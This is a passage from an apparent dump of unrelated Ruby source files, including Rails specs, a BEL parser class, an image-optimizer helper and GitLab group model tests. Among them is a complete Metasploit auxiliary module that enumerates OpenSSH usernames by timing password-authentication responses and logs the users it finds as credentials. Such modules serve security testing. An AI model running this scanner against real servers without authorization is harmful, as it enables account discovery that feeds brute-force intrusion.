def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 28.037634 | 107 | 0.61745 |
bfa5cf75d6d8c814cf84d15751124a8f5a49e9bb | 1,151 | # frozen_string_literal: true
require 'English'
class ImageOptim
# Helper for running commands
module Cmd
class << self
# Run using `system`
# Return success status
# Will raise SignalException if process was interrupted
def run(*args)
success = system(*args)
check_status!
success
end
# Run using backtick
# Return captured output
# Will raise SignalException if process was interrupted
def capture(cmd)
output = `#{cmd}`
check_status!
output
end
private
def check_status!
status = $CHILD_STATUS
return unless status.signaled?
# jruby incorrectly returns true for `signaled?` if process exits with
# non zero status. For following code
#
# `sh -c 'exit 66'`
# p [$?.signaled?, $?.exitstatus, $?.termsig]
#
# jruby outputs `[true, 66, 66]` instead of expected `[false, 66, nil]`
return if defined?(JRUBY_VERSION) && status.exitstatus == status.termsig
fail SignalException, status.termsig
end
end
end
end
| 22.134615 | 80 | 0.595135 |
611cf8d5fe9f1fdba1cd135bff2fdbe03e54296f | 2,290 | require_relative '../../version1_0'
require_relative '../../function'
require_relative '../../signature'
require_relative '../../semantics'
module BELParser
module Language
module Version1_0
module Functions
# Reaction: Denotes the frequency or abundance of events in
# a reaction
class Reaction
extend Function
SHORT = :rxn
LONG = :reaction
RETURN_TYPE = BELParser::Language::Version1_0::ReturnTypes::Abundance
DESCRIPTION = 'Denotes the frequency or abundance of events
n a reaction'.freeze
def self.short
SHORT
end
def self.long
LONG
end
def self.return_type
RETURN_TYPE
end
def self.description
DESCRIPTION
end
def self.signatures
SIGNATURES
end
module Signatures
# ReactionSignature
class ReactionSignature
extend BELParser::Language::Signature
private_class_method :new
AST = BELParser::Language::Semantics::Builder.build do
term(
function(
identifier(
function_of(Reaction))),
argument(
term(
function(
identifier(
return_type_of(BELParser::Language::Version1_0::ReturnTypes::Reactants))))),
argument(
term(
function(
identifier(
return_type_of(BELParser::Language::Version1_0::ReturnTypes::Products))))))
end
private_constant :AST
STRING_FORM = 'reaction(F:reactants,F:products)abundance'.freeze
private_constant :STRING_FORM
def self.semantic_ast
AST
end
def self.string_form
STRING_FORM
end
end
end
SIGNATURES = Signatures.constants.map do |const|
Signatures.const_get(const)
end.freeze
end
end
end
end
end
| 26.321839 | 102 | 0.500437 |
f85c364e4f6bd8f4ee19247bf7296112a6a90b5e | 199 | Rails.application.routes.draw do
# Define your application routes per the DSL in https://guides.rubyonrails.org/routing.html
# Defines the root path route ("/")
# root "application#hello"
end
| 28.428571 | 93 | 0.743719 |
fff48e4f589b68fb0dbb026f99c9ec63454b0746 | 427 | cask '[email protected]' do
version '5.5.3f1,4d2f809fd6f3'
sha256 'a1f48d94839096bd2e1f2c12d5d7eaa4173852d35ce8e1e29e1d5b30decedbba'
url "http://download.unity3d.com/download_unity/#{version.after_comma}/UnityDownloadAssistant-#{version.before_comma}.dmg"
name 'Unity'
homepage 'https://unity3d.com/unity/'
installer manual: 'Unity Download Assistant.app'
uninstall pkgutil: 'com.unity3d.*'
end
| 32.846154 | 124 | 0.782201 |
0194ddbf2fcb0f1203ec305698f11265144c6c0d | 655 | require_relative 'helper'
class User < Sohm::Model
include Sohm::AutoId
end
test "returns an empty hash if model doesn't have set attributes" do
assert_equal Hash.new, User.new.to_hash
end
test "returns a hash with its id if model is persisted" do
user = User.create
assert_equal Hash[id: user.id], user.to_hash
end
class Person < Sohm::Model
include Sohm::AutoId
attribute :name
def to_hash
super.merge(name: name)
end
end
test "returns additional attributes if the method is overrided" do
person = Person.create(name: "John")
expected = { id: person.id, name: person.name }
assert_equal expected, person.to_hash
end
| 19.848485 | 68 | 0.732824 |
d52c3f2fab955ec9e18874f99dbefceb1fc17d93 | 564 | require "rails_helper"
describe SiteStatusPolicy do
let(:organisation) { site_status.course.provider.organisations.first }
let(:site_status) { create :site_status }
subject { described_class }
permissions :update? do
let(:user) { create(:user).tap { |u| organisation.users << u } }
context "with an user inside the organisation" do
it { should permit(user, site_status) }
end
context "with a user outside the organisation" do
let(:user) { build(:user) }
it { should_not permit(user, site_status) }
end
end
end
| 24.521739 | 72 | 0.680851 |
1dcd3ac78d25a0da6c2a3a2cdb9888351714bac1 | 423 | module Org
module Model::JobDescription
extend ActiveSupport::Concern
included do
attribute :requirements, :text
attribute :advanced_requirements, :text
attribute :english_requirement, :string
attribute :degree_requirement, :string
attribute :duties, :text
attribute :salary_min, :integer
attribute :salary_max, :integer
belongs_to :department
end
end
end
| 22.263158 | 45 | 0.699764 |
9192aa2d9b793d367175600a60ee796e50e0f542 | 133 | class PgTableAccess < AdminFullAccess
def show?(table)
PgDataSourceAccess.new(context).can? :show, table.data_source
end
end
| 22.166667 | 65 | 0.766917 |
2698b963a318ea71a8261a195eb13217ed180566 | 576 | require 'rails_helper'
RSpec.describe PessoaPolicy do
let(:user) { User.new }
subject { described_class }
permissions ".scope" do
pending "add some examples to (or delete) #{__FILE__}"
end
permissions :show? do
pending "add some examples to (or delete) #{__FILE__}"
end
permissions :create? do
pending "add some examples to (or delete) #{__FILE__}"
end
permissions :update? do
pending "add some examples to (or delete) #{__FILE__}"
end
permissions :destroy? do
pending "add some examples to (or delete) #{__FILE__}"
end
end
| 19.862069 | 58 | 0.682292 |
aba7d20b48389639d9ae00bad03fb7f1a36f69bd | 749 | # frozen_string_literal: true
class CreateGrades < ActiveRecord::Migration
def change
create_table :grades do |t|
t.string :grade
t.integer :parent_id, index: true
t.timestamps null: false
end
create_table :document_grades do |t|
t.references :document, index: true, foreign_key: true
t.references :grade, index: true, foreign_key: true
t.timestamps null: false
end
create_table :lobject_grades do |t|
t.references :lobject, index: true, foreign_key: true
t.references :document, index: true, foreign_key: true
t.references :grade, index: true, foreign_key: true
t.timestamps null: false
end
add_foreign_key :grades, :grades, column: :parent_id
end
end
| 27.740741 | 60 | 0.687583 |
1d26144f2148df0c229c870a58664104dd5bc154 | 894 | #-------------------------------------------------------------------------------
#
# Thomas Thomassen
# thomas[at]thomthom[dot]net
#
#-------------------------------------------------------------------------------
module TT::Plugins::SolidInspector2
module Binary
module Types
# Standard Types
CHAR = "c".freeze
INT_16_T = "s" .freeze
INT_32_T = "l" .freeze
INT_64_T = "q" .freeze
UCHAR = "C".freeze
UINT_16_T = "S" .freeze
UINT_32_T = "L" .freeze
UINT_64_T = "Q" .freeze
UINT_16_BE = "n".freeze
UINT_32_BE = "N".freeze
UINT_16_LE = "v".freeze
UINT_32_LE = "V".freeze
# Windows Types
DWORD = UINT_32_LE
LONG = UINT_32_LE
WORD = UINT_16_LE
end # module
end # module
end # module TT::Plugins::SolidInspector2
| 21.804878 | 81 | 0.439597 |
3379adad443caa6669f22313e6a7db36729834af | 5,073 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'net/ssh'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Auxiliary::CommandShell
def initialize(info = {})
super(update_info(info,
'Name' => 'SSH Username Enumeration',
'Description' => %q{
This module uses a time-based attack to enumerate users on an OpenSSH server.
On some versions of OpenSSH under some configurations, OpenSSH will return a
"permission denied" error for an invalid user faster than for a valid user.
},
'Author' => ['kenkeiras'],
'References' =>
[
['CVE', '2006-5229'],
['OSVDB', '32721'],
['BID', '20418']
],
'License' => MSF_LICENSE
))
register_options(
[
Opt::Proxies,
Opt::RPORT(22),
OptPath.new('USER_FILE',
[true, 'File containing usernames, one per line', nil]),
OptInt.new('THRESHOLD',
[true,
'Amount of seconds needed before a user is considered ' \
'found', 10])
], self.class
)
register_advanced_options(
[
OptInt.new('RETRY_NUM',
[true , 'The number of attempts to connect to a SSH server' \
' for each user', 3]),
OptInt.new('SSH_TIMEOUT',
[false, 'Specify the maximum time to negotiate a SSH session',
10]),
OptBool.new('SSH_DEBUG',
[false, 'Enable SSH debugging output (Extreme verbosity!)',
false])
]
)
end
def rport
datastore['RPORT']
end
def retry_num
datastore['RETRY_NUM']
end
def threshold
datastore['THRESHOLD']
end
# Returns true if a nonsense username appears active.
def check_false_positive(ip)
user = Rex::Text.rand_text_alphanumeric(8)
result = attempt_user(user, ip)
return(result == :success)
end
def check_user(ip, user, port)
pass = Rex::Text.rand_text_alphanumeric(64_000)
opt_hash = {
:auth_methods => ['password', 'keyboard-interactive'],
:msframework => framework,
:msfmodule => self,
:port => port,
:disable_agent => true,
:password => pass,
:config => false,
:proxies => datastore['Proxies']
}
opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
start_time = Time.new
begin
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
Net::SSH.start(ip, user, opt_hash)
end
rescue Rex::ConnectionError
return :connection_error
rescue Net::SSH::Disconnect, ::EOFError
return :success
rescue ::Timeout::Error
return :success
rescue Net::SSH::Exception
end
finish_time = Time.new
if finish_time - start_time > threshold
:success
else
:fail
end
end
def do_report(ip, user, port)
service_data = {
address: ip,
port: rport,
service_name: 'ssh',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: user,
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
}.merge(service_data)
create_credential_login(login_data)
end
# Because this isn't using the AuthBrute mixin, we don't have the
# usual peer method
def peer(rhost=nil)
"#{rhost}:#{rport} - SSH -"
end
def user_list
if File.readable? datastore['USER_FILE']
File.new(datastore['USER_FILE']).read.split
else
raise ArgumentError, "Cannot read file #{datastore['USER_FILE']}"
end
end
def attempt_user(user, ip)
attempt_num = 0
ret = nil
while attempt_num <= retry_num and (ret.nil? or ret == :connection_error)
if attempt_num > 0
Rex.sleep(2 ** attempt_num)
vprint_status("#{peer(ip)} Retrying '#{user}' due to connection error")
end
ret = check_user(ip, user, rport)
attempt_num += 1
end
ret
end
def show_result(attempt_result, user, ip)
case attempt_result
when :success
print_good("#{peer(ip)} User '#{user}' found")
do_report(ip, user, rport)
when :connection_error
print_error("#{peer(ip)} User '#{user}' on could not connect")
when :fail
print_error("#{peer(ip)} User '#{user}' not found")
end
end
def run_host(ip)
print_status "#{peer(ip)} Checking for false positives"
if check_false_positive(ip)
print_error "#{peer(ip)} throws false positive results. Aborting."
return
else
print_status "#{peer(ip)} Starting scan"
user_list.each{ |user| show_result(attempt_user(user, ip), user, ip) }
end
end
end
| 25.621212 | 85 | 0.597871 |
03d2e87bdac317c80898258d60e553cbb2471068 | 1,149 | module RubyCAS
module Server
module Core
module Tickets
class TicketGrantingTicket < Storage
attr_accessor :id, :ticket, :client_hostname, :username,
:extra_attributes, :service_tickets, :proxy_tickets,
:created_at, :updated_at
def initialize(tgt = {})
@id = SecureRandom.uuid
@ticket = tgt[:ticket]
@client_hostname = tgt[:client_hostname]
@username = tgt[:username]
@extra_attributes = tgt[:extra_attributes]
@service_tickets = tgt[:service_tickets]
@proxy_tickets = tgt[:proxy_tickets]
@created_at = DateTime.now
@updated_at = DateTime.now
super()
end
def self.find_by_ticket(ticket)
@storage.each do |id, tgt|
return tgt if tgt.ticket == ticket
end
return nil
end
def expired?(max_lifetime)
lifetime = Time.now.to_i - created_at.to_time.to_i
lifetime > max_lifetime
end
end
end
end
end
end
| 29.461538 | 76 | 0.54134 |
7a9fdd45e8214df90e7686c9aaec674fa07a9963 | 5,888 | # encoding: utf-8
require "cases/helper"
require 'active_record/base'
require 'active_record/connection_adapters/postgresql_adapter'
require 'support/schema_dumping_helper'
module PostgresqlJSONSharedTestCases
include SchemaDumpingHelper
class JsonDataType < ActiveRecord::Base
self.table_name = 'json_data_type'
store_accessor :settings, :resolution
end
def setup
@connection = ActiveRecord::Base.connection
begin
@connection.transaction do
@connection.create_table('json_data_type') do |t|
t.public_send column_type, 'payload', default: {} # t.json 'payload', default: {}
t.public_send column_type, 'settings' # t.json 'settings'
end
end
rescue ActiveRecord::StatementInvalid
skip "do not test on PG without json"
end
@column = JsonDataType.columns_hash['payload']
end
def teardown
@connection.execute 'drop table if exists json_data_type'
end
def test_column
column = JsonDataType.columns_hash["payload"]
assert_equal column_type, column.type
assert_equal column_type.to_s, column.sql_type
assert_not column.number?
assert_not column.binary?
assert_not column.array
end
def test_default
@connection.add_column 'json_data_type', 'permissions', column_type, default: '{"users": "read", "posts": ["read", "write"]}'
JsonDataType.reset_column_information
assert_equal({"users"=>"read", "posts"=>["read", "write"]}, JsonDataType.column_defaults['permissions'])
assert_equal({"users"=>"read", "posts"=>["read", "write"]}, JsonDataType.new.permissions)
ensure
JsonDataType.reset_column_information
end
def test_change_table_supports_json
@connection.transaction do
@connection.change_table('json_data_type') do |t|
t.public_send column_type, 'users', default: '{}' # t.json 'users', default: '{}'
end
JsonDataType.reset_column_information
column = JsonDataType.columns_hash['users']
assert_equal column_type, column.type
raise ActiveRecord::Rollback # reset the schema change
end
ensure
JsonDataType.reset_column_information
end
def test_schema_dumping
output = dump_table_schema("json_data_type")
assert_match(/t.#{column_type.to_s}\s+"payload",\s+default: {}/, output)
end
def test_cast_value_on_write
x = JsonDataType.new payload: {"string" => "foo", :symbol => :bar}
assert_equal({"string" => "foo", :symbol => :bar}, x.payload_before_type_cast)
assert_equal({"string" => "foo", "symbol" => "bar"}, x.payload)
x.save
assert_equal({"string" => "foo", "symbol" => "bar"}, x.reload.payload)
end
def test_type_cast_json
column = JsonDataType.columns_hash["payload"]
data = "{\"a_key\":\"a_value\"}"
hash = column.type_cast_from_database(data)
assert_equal({'a_key' => 'a_value'}, hash)
assert_equal({'a_key' => 'a_value'}, column.type_cast_from_database(data))
assert_equal({}, column.type_cast_from_database("{}"))
assert_equal({'key'=>nil}, column.type_cast_from_database('{"key": null}'))
assert_equal({'c'=>'}','"a"'=>'b "a b'}, column.type_cast_from_database(%q({"c":"}", "\"a\"":"b \"a b"})))
end
def test_rewrite
@connection.execute "insert into json_data_type (payload) VALUES ('{\"k\":\"v\"}')"
x = JsonDataType.first
x.payload = { '"a\'' => 'b' }
assert x.save!
end
def test_select
@connection.execute "insert into json_data_type (payload) VALUES ('{\"k\":\"v\"}')"
x = JsonDataType.first
assert_equal({'k' => 'v'}, x.payload)
end
def test_select_multikey
@connection.execute %q|insert into json_data_type (payload) VALUES ('{"k1":"v1", "k2":"v2", "k3":[1,2,3]}')|
x = JsonDataType.first
assert_equal({'k1' => 'v1', 'k2' => 'v2', 'k3' => [1,2,3]}, x.payload)
end
def test_null_json
@connection.execute %q|insert into json_data_type (payload) VALUES(null)|
x = JsonDataType.first
assert_equal(nil, x.payload)
end
def test_select_array_json_value
@connection.execute %q|insert into json_data_type (payload) VALUES ('["v0",{"k1":"v1"}]')|
x = JsonDataType.first
assert_equal(['v0', {'k1' => 'v1'}], x.payload)
end
def test_rewrite_array_json_value
@connection.execute %q|insert into json_data_type (payload) VALUES ('["v0",{"k1":"v1"}]')|
x = JsonDataType.first
x.payload = ['v1', {'k2' => 'v2'}, 'v3']
assert x.save!
end
def test_with_store_accessors
x = JsonDataType.new(resolution: "320×480")
assert_equal "320×480", x.resolution
x.save!
x = JsonDataType.first
assert_equal "320×480", x.resolution
x.resolution = "640×1136"
x.save!
x = JsonDataType.first
assert_equal "640×1136", x.resolution
end
def test_duplication_with_store_accessors
x = JsonDataType.new(resolution: "320×480")
assert_equal "320×480", x.resolution
y = x.dup
assert_equal "320×480", y.resolution
end
def test_yaml_round_trip_with_store_accessors
x = JsonDataType.new(resolution: "320×480")
assert_equal "320×480", x.resolution
y = YAML.load(YAML.dump(x))
assert_equal "320×480", y.resolution
end
def test_changes_in_place
json = JsonDataType.new
assert_not json.changed?
json.payload = { 'one' => 'two' }
assert json.changed?
assert json.payload_changed?
json.save!
assert_not json.changed?
json.payload['three'] = 'four'
assert json.payload_changed?
json.save!
json.reload
assert_equal({ 'one' => 'two', 'three' => 'four' }, json.payload)
assert_not json.changed?
end
end
class PostgresqlJSONTest < ActiveRecord::TestCase
include PostgresqlJSONSharedTestCases
def column_type
:json
end
end
class PostgresqlJSONBTest < ActiveRecord::TestCase
include PostgresqlJSONSharedTestCases
def column_type
:jsonb
end
end
| 29.148515 | 129 | 0.676461 |
91182d7ffb3a9ae2f8ba85a5ba32547c86dc6b94 | 475 | require 'bundler/setup'
require 'minitest'
require 'minitest/autorun'
require 'minitest/reporters'
require 'minitest/spec'
require 'dragonfly'
require 'dragonfly_pdf'
SAMPLES_DIR = Pathname.new(File.expand_path('../../samples', __FILE__))
Minitest::Reporters.use! Minitest::Reporters::SpecReporter.new
def test_app(name = nil)
app = Dragonfly::App.instance(name).tap do |app|
app.datastore = Dragonfly::MemoryDataStore.new
app.secret = 'test secret'
end
end
| 22.619048 | 71 | 0.749474 |
e95251f4ae37bffb900fc3cd8ead5c90cebf4489 | 126 | require 'test_helper'
class BoardMessageTest < ActiveSupport::TestCase
# test "the truth" do
# assert true
# end
end
| 15.75 | 48 | 0.714286 |
79440bbc490d4423a3996616c694af6c44d52f8d | 438 | class News
include Mongoid::Document
field :version, type: String
field :message, type: String
validates :version, presence: true, format: { with: /\A\d{1,3}\.\d{1,3}\.\d{1,3}\z/ }
validates :message, presence: true, length: { minimum: 3, maximum: 300 }
def ==(obj)
return false if obj.nil?
return false unless self.class == obj.class
(self.message == obj.message) && (self.version == obj.version)
end
end | 29.2 | 87 | 0.646119 |
bb27766712cdcf277986c8aa4addae530164e97c | 4,478 | class Post < ApplicationRecord
include WithActivity
include ContentProcessable
include ContentEmbeddable
WordfilterCallbacks.hook(self, :post, :content)
acts_as_paranoid
resourcify
processable :content, LongPipeline
update_algolia 'AlgoliaPostsIndex'
embed_links_in :content, to: :embed
enum locked_reason: { spam: 0, too_heated: 1, closed: 2 }
belongs_to :user
belongs_to :edited_by, class_name: 'User', optional: true
belongs_to :target_user, class_name: 'User', optional: true
belongs_to :target_group, class_name: 'Group', optional: true
belongs_to :media, polymorphic: true, optional: true
belongs_to :spoiled_unit, polymorphic: true, optional: true
belongs_to :community_recommendation, optional: true
belongs_to :locked_by, class_name: 'User', optional: true
has_many :post_likes, dependent: :destroy
has_many :post_follows, dependent: :destroy
has_many :comments, dependent: :destroy
has_many :uploads, as: 'owner', dependent: :destroy
has_one :ama, foreign_key: 'original_post_id'
has_one :pinner, class_name: 'User', foreign_key: 'pinned_post_id', dependent: :nullify
has_many :reposts, dependent: :delete_all
scope :sfw, -> { where(nsfw: false) }
scope :in_group, ->(group) { where(target_group: group) }
scope :visible_for, ->(user) {
where(target_group_id: Group.visible_for(user))
.or(where(target_group_id: nil))
.where(hidden_at: nil)
.or(where(user_id: user).where.not(hidden_at: nil))
}
validates :content, :content_formatted, presence: true, unless: :uploads
validates :uploads, presence: true, unless: :content
validates :media, presence: true, if: :spoiled_unit
validates :content, length: { maximum: 9_000 }
validates :media, polymorphism: { type: Media }, allow_blank: true
# posting to a group, posting to a profile, and posting to an interest are mutually exclusive.
validates_with ExclusivityValidator, over: %i[target_user target_group target_interest]
validates_with ExclusivityValidator, over: %i[uploads embed]
validates :target_user, absence: true, if: :target_group
def feed
PostFeed.new(id)
end
def comments_feed
PostCommentsFeed.new(id)
end
def other_feeds
feeds = []
feeds << GlobalFeed.new if user.share_to_global? && target_user.blank? && target_group.blank?
# Limit media-feed fanout when targeting a unit
feeds << (spoiled_unit ? media&.feed&.no_fanout : media&.feed)
feeds << spoiled_unit&.feed
feeds.compact
end
def notified_feeds
[
target_user&.notifications,
*mentioned_users.map(&:notifications)
].compact - [user.notifications]
end
def target_feed
if target_user # A => B, post to B without fanout
target_user.profile_feed.no_fanout
elsif target_group # A => Group, post to Group
target_group.feed
else # General post, fanout normally
user.profile_feed
end
end
def target_timelines
return [] unless target_user
[user.timeline, target_user.timeline]
end
def stream_activity
target_feed.activities.new(
post_id: id,
updated_at: updated_at,
post_likes_count: post_likes_count,
comments_count: comments_count,
nsfw: nsfw,
mentioned_users: mentioned_users.pluck(:id),
to: other_feeds + notified_feeds + target_timelines
)
end
def mentioned_users
User.where(id: processed_content[:mentioned_users])
end
def locked?
locked_by.present?
end
before_save do
# Always check if the media is NSFW and try to force into NSFWness
self.nsfw = media.try(:nsfw?) || false unless nsfw
self.nsfw = target_group.try(:nsfw?) || false unless nsfw
true
end
before_update do
if content_changed? || nsfw_changed? || spoiler?
self.edited_at = Time.now
self.edited_by = User.current
end
true
end
after_create do
User.increment_counter(:posts_count, user.id) unless user.posts_count >= 20
media.trending_vote(user, 2.0) if media.present?
GroupUnreadFanoutWorker.perform_async(target_group_id, user_id) if target_group.present?
if community_recommendation.present?
CommunityRecommendationReasonWorker.perform_async(self, community_recommendation)
end
end
before_destroy do
deletions = reposts.pluck(:user_id, :id).map do |user_id, repost_id|
[['user', user_id], { foreign_id: "repost:#{repost_id}" }]
end
ActivityDeletionWorker.perform_async(deletions)
end
end
| 32.215827 | 97 | 0.722421 |
d569cdc3c38c2105d56007eae67c2c8dd03ef850 | 951 | # frozen_string_literal: true
require_relative '../core/lib/spree/core/version.rb'
Gem::Specification.new do |gem|
gem.author = 'Solidus Team'
gem.email = '[email protected]'
gem.homepage = 'http://solidus.io/'
gem.license = 'BSD-3-Clause'
gem.summary = 'REST API for the Solidus e-commerce framework.'
gem.description = gem.summary
gem.files = `git ls-files`.split($\)
gem.executables = gem.files.grep(%r{^bin/}).map{ |f| File.basename(f) }
gem.test_files = gem.files.grep(%r{^(test|spec|features)/})
gem.name = "solidus_api"
gem.require_paths = ["lib"]
gem.version = Spree.solidus_version
gem.required_ruby_version = '>= 2.2.2'
gem.required_rubygems_version = '>= 1.8.23'
gem.add_dependency 'jbuilder', '~> 2.6'
gem.add_dependency 'kaminari-activerecord', '~> 1.0.1'
gem.add_dependency 'responders'
gem.add_dependency 'solidus_core', gem.version
end
| 32.793103 | 75 | 0.656151 |
4aa0f87cbde0b45b5cb5d8ff8867fae0baa72613 | 416 | # frozen_string_literal: true
FactoryBot.define do
factory :assignment do
title do
Faker::Marketing.buzzwords +
Faker::Number.between(from: 1, to: 9999).to_s
end
deadline { Faker::Time.forward(days: 30) }
accepted_file_type { '.pdf' }
trait :with_lecture do
association :lecture, :released_for_all
end
factory :valid_assignment, traits: [:with_lecture]
end
end
| 21.894737 | 54 | 0.677885 |
5dcc95be63fa0192675c8fa2cd88c7856def4e59 | 2,198 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/datacatalog/v1/table_spec.proto
require 'google/api/field_behavior_pb'
require 'google/api/resource_pb'
require 'google/protobuf'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/cloud/datacatalog/v1/table_spec.proto", :syntax => :proto3) do
add_message "google.cloud.datacatalog.v1.BigQueryTableSpec" do
optional :table_source_type, :enum, 1, "google.cloud.datacatalog.v1.TableSourceType"
oneof :type_spec do
optional :view_spec, :message, 2, "google.cloud.datacatalog.v1.ViewSpec"
optional :table_spec, :message, 3, "google.cloud.datacatalog.v1.TableSpec"
end
end
add_message "google.cloud.datacatalog.v1.ViewSpec" do
optional :view_query, :string, 1
end
add_message "google.cloud.datacatalog.v1.TableSpec" do
optional :grouped_entry, :string, 1
end
add_message "google.cloud.datacatalog.v1.BigQueryDateShardedSpec" do
optional :dataset, :string, 1
optional :table_prefix, :string, 2
optional :shard_count, :int64, 3
optional :latest_shard_resource, :string, 4
end
add_enum "google.cloud.datacatalog.v1.TableSourceType" do
value :TABLE_SOURCE_TYPE_UNSPECIFIED, 0
value :BIGQUERY_VIEW, 2
value :BIGQUERY_TABLE, 5
value :BIGQUERY_MATERIALIZED_VIEW, 7
end
end
end
module Google
module Cloud
module DataCatalog
module V1
BigQueryTableSpec = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.datacatalog.v1.BigQueryTableSpec").msgclass
ViewSpec = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.datacatalog.v1.ViewSpec").msgclass
TableSpec = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.datacatalog.v1.TableSpec").msgclass
BigQueryDateShardedSpec = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.datacatalog.v1.BigQueryDateShardedSpec").msgclass
TableSourceType = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.datacatalog.v1.TableSourceType").enummodule
end
end
end
end
| 43.098039 | 154 | 0.743858 |
38f3eadbb223a5579b704959470af68054a5e4ae | 95,485 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Group do
include ReloadHelpers
let!(:group) { create(:group) }
describe 'associations' do
it { is_expected.to have_many :projects }
it { is_expected.to have_many(:group_members).dependent(:destroy) }
it { is_expected.to have_many(:users).through(:group_members) }
it { is_expected.to have_many(:owners).through(:group_members) }
it { is_expected.to have_many(:requesters).dependent(:destroy) }
it { is_expected.to have_many(:members_and_requesters) }
it { is_expected.to have_many(:project_group_links).dependent(:destroy) }
it { is_expected.to have_many(:shared_projects).through(:project_group_links) }
it { is_expected.to have_many(:notification_settings).dependent(:destroy) }
it { is_expected.to have_many(:labels).class_name('GroupLabel') }
it { is_expected.to have_many(:variables).class_name('Ci::GroupVariable') }
it { is_expected.to have_many(:uploads) }
it { is_expected.to have_one(:chat_team) }
it { is_expected.to have_many(:custom_attributes).class_name('GroupCustomAttribute') }
it { is_expected.to have_many(:badges).class_name('GroupBadge') }
it { is_expected.to have_many(:cluster_groups).class_name('Clusters::Group') }
it { is_expected.to have_many(:clusters).class_name('Clusters::Cluster') }
it { is_expected.to have_many(:container_repositories) }
it { is_expected.to have_many(:milestones) }
it { is_expected.to have_many(:group_deploy_keys) }
it { is_expected.to have_many(:integrations) }
it { is_expected.to have_one(:dependency_proxy_setting) }
it { is_expected.to have_one(:dependency_proxy_image_ttl_policy) }
it { is_expected.to have_many(:dependency_proxy_blobs) }
it { is_expected.to have_many(:dependency_proxy_manifests) }
it { is_expected.to have_many(:debian_distributions).class_name('Packages::Debian::GroupDistribution').dependent(:destroy) }
it { is_expected.to have_many(:daily_build_group_report_results).class_name('Ci::DailyBuildGroupReportResult') }
describe '#members & #requesters' do
let(:requester) { create(:user) }
let(:developer) { create(:user) }
before do
group.request_access(requester)
group.add_developer(developer)
end
it_behaves_like 'members and requesters associations' do
let(:namespace) { group }
end
end
end
describe 'modules' do
subject { described_class }
it { is_expected.to include_module(Referable) }
end
describe 'validations' do
it { is_expected.to validate_presence_of :name }
it { is_expected.to allow_value('group test_4').for(:name) }
it { is_expected.not_to allow_value('test/../foo').for(:name) }
it { is_expected.not_to allow_value('<script>alert("Attack!")</script>').for(:name) }
it { is_expected.to validate_presence_of :path }
it { is_expected.not_to validate_presence_of :owner }
it { is_expected.to validate_presence_of :two_factor_grace_period }
it { is_expected.to validate_numericality_of(:two_factor_grace_period).is_greater_than_or_equal_to(0) }
context 'validating the parent of a group' do
context 'when the group has no parent' do
it 'allows a group to have no parent associated with it' do
group = build(:group)
expect(group).to be_valid
end
end
context 'when the group has a parent' do
it 'does not allow a group to have a namespace as its parent' do
group = build(:group, parent: build(:namespace))
expect(group).not_to be_valid
expect(group.errors[:parent_id].first).to eq('a group cannot have a user namespace as its parent')
end
it 'allows a group to have another group as its parent' do
group = build(:group, parent: build(:group))
expect(group).to be_valid
end
end
context 'when the feature flag `validate_namespace_parent_type` is disabled' do
before do
stub_feature_flags(validate_namespace_parent_type: false)
end
context 'when the group has no parent' do
it 'allows a group to have no parent associated with it' do
group = build(:group)
expect(group).to be_valid
end
end
context 'when the group has a parent' do
it 'allows a group to have a namespace as its parent' do
group = build(:group, parent: build(:namespace))
expect(group).to be_valid
end
it 'allows a group to have another group as its parent' do
group = build(:group, parent: build(:group))
expect(group).to be_valid
end
end
end
end
describe 'path validation' do
it 'rejects paths reserved on the root namespace when the group has no parent' do
group = build(:group, path: 'api')
expect(group).not_to be_valid
end
it 'allows root paths when the group has a parent' do
group = build(:group, path: 'api', parent: create(:group))
expect(group).to be_valid
end
it 'rejects any wildcard paths when not a top level group' do
group = build(:group, path: 'tree', parent: create(:group))
expect(group).not_to be_valid
end
end
describe '#notification_settings' do
let(:user) { create(:user) }
let(:group) { create(:group) }
let(:sub_group) { create(:group, parent_id: group.id) }
before do
group.add_developer(user)
sub_group.add_maintainer(user)
end
it 'also gets notification settings from parent groups' do
expect(sub_group.notification_settings.size).to eq(2)
expect(sub_group.notification_settings).to include(group.notification_settings.first)
end
context 'when sub group is deleted' do
it 'does not delete parent notification settings' do
expect do
sub_group.destroy
end.to change { NotificationSetting.count }.by(-1)
end
end
end
describe '#notification_email_for' do
let(:user) { create(:user) }
let(:group) { create(:group) }
let(:subgroup) { create(:group, parent: group) }
let(:group_notification_email) { '[email protected]' }
let(:subgroup_notification_email) { '[email protected]' }
before do
create(:email, :confirmed, user: user, email: group_notification_email)
create(:email, :confirmed, user: user, email: subgroup_notification_email)
end
subject { subgroup.notification_email_for(user) }
context 'when both group notification emails are set' do
it 'returns subgroup notification email' do
create(:notification_setting, user: user, source: group, notification_email: group_notification_email)
create(:notification_setting, user: user, source: subgroup, notification_email: subgroup_notification_email)
is_expected.to eq(subgroup_notification_email)
end
end
context 'when subgroup notification email is blank' do
